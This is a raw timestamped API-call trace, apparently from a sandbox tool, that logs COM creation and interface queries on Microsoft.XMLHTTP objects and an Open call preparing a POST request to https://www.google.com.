	[0215.143] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0215.143] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0215.143] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0215.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d168 | out: ppvObject=0x28d168*=0x629bd0) returned 0x0
	[0215.143] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d160 | out: ppvObject=0x28d160*=0x0) returned 0x80004002
	[0215.143] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0215.144] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0215.144] SysStringLen (param_1=0x0) returned 0x0
	[0215.144] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0215.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0215.144] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0215.144] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0215.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0215.144] ??2@YAPEAX_K@Z () returned 0x62b540
	[0215.144] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62b540) returned 0x0
	[0215.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8 | out: ppvObject=0x28d7c8*=0x0) returned 0x80004002
	[0215.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7d0 | out: ppvObject=0x28d7d0*=0x0) returned 0x80004002
	[0215.144] XMLHTTPRequest:IUnknown:AddRef (This=0x62b540) returned 0x2
	[0215.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d9b0 | out: ppvObject=0x28d9b0*=0x62b540) returned 0x0
	[0215.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c7d0 | out: ppvObject=0x28c7d0*=0x62b540) returned 0x0
	[0215.144] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c808 | out: ppvObject=0x28c808*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c7f8 | out: ppvObject=0x28c7f8*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0215.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8b8 | out: ppvObject=0x28c8b8*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c8a0 | out: ppvObject=0x28c8a0*=0x62b540) returned 0x0
	[0215.145] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8d0 | out: ppvObject=0x28c8d0*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0215.145] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0215.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d9c8 | out: ppvObject=0x28d9c8*=0x62b540) returned 0x0
	[0215.145] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d9c0 | out: ppvObject=0x28d9c0*=0x0) returned 0x80004002
	[0215.145] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0215.145] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0215.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0215.145] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0215.145] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x2
	[0215.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0215.146] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0215.146] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x2
	[0215.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0215.146] XMLHTTPRequest:IDispatch:Invoke (This=0x49c74b0, dispIdMember=1, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40, puArgErr=0x28da10) 
	[0215.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf68 | out: ppvObject=0x28cf68*=0x0) returned 0x80004002
	[0215.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf70 | out: ppvObject=0x28cf70*=0x0) returned 0x80004002
	[0215.146] XMLHTTPRequest:IUnknown:AddRef (This=0x62b540) returned 0x2
	[0215.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d150 | out: ppvObject=0x28d150*=0x62b540) returned 0x0
	[0215.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28bf70 | out: ppvObject=0x28bf70*=0x62b540) returned 0x0
	[0215.146] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28bfa8 | out: ppvObject=0x28bfa8*=0x0) returned 0x80004002
	[0215.146] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28bf98 | out: ppvObject=0x28bf98*=0x0) returned 0x80004002
	[0215.146] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0215.146] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0215.146] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0215.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0215.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c058 | out: ppvObject=0x28c058*=0x0) returned 0x80004002
	[0215.147] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c040) 
	[0215.147] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0215.147] SysStringLen (param_1=0x0) returned 0x0
	[0215.147] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0215.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0215.147] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0215.147] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0215.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7608) returned 0x0
	[0215.147] ??2@YAPEAX_K@Z () returned 0x629bd0
	[0215.147] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7608, pUnkSite=0x629bd0) 
	[0215.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8 | out: ppvObject=0x28d7c8*=0x0) returned 0x80004002
	[0215.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7d0 | out: ppvObject=0x28d7d0*=0x0) returned 0x80004002
	[0215.147] XMLHTTPRequest:IUnknown:AddRef (This=0x629bd0) returned 0x2
	[0215.147] XMLHTTPRequest:IUnknown:QueryInterface (This=0x629bd0, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d9b0) 
	[0215.148] XMLHTTPRequest:IUnknown:Release (This=0x49c7608) returned 0x0
	[0215.148] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0215.148] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0215.148] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0215.148] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0215.148] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0215.149] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0215.149] SysStringLen (param_1=0x0) returned 0x0
	[0215.149] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0215.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
